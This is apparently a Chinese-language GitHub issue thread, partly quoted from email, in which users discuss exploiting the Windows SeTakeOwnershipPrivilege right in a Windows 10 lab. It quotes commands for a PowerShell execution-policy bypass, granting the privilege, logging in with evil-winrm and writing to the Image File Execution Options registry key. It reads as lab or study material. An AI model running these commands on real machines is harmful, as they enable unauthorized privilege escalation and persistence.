zusda

能用，但作用仅仅是获取了注册表某条目的权限，我后面添加了serestore的利用代码(你发的代码中的// exploit it via restore注释部分)，但是报错，说没有权限访问，但我手动操作确实是获得权限了的。 后来我自己利用部分这，用了windows自带的reg.exe。成功修改注册表的条目内容了。 我是win10环境 配置命令： powershell -ep bypass Import-Module carbon Grant-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege Test-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege 然后用winrm登录 evil-winrm -i 10.254.1.102 -u aarti -p...

是的 ---原始邮件--- 发件人: ***@***.***> 发送时间: 2022年5月17日(周二) 下午3:05 收件人: ***@***.***>; 抄送: ***@***.******@***.***>; 主题: Re: [3gstudent/Homework-of-C-Language] SeTakeOwnershipPrivilege的利用 (Issue #8) 我可以这么理解吗： https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp 这个代码可以生效，然后能够以低权限执行reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v takeownership /t REG_SZ...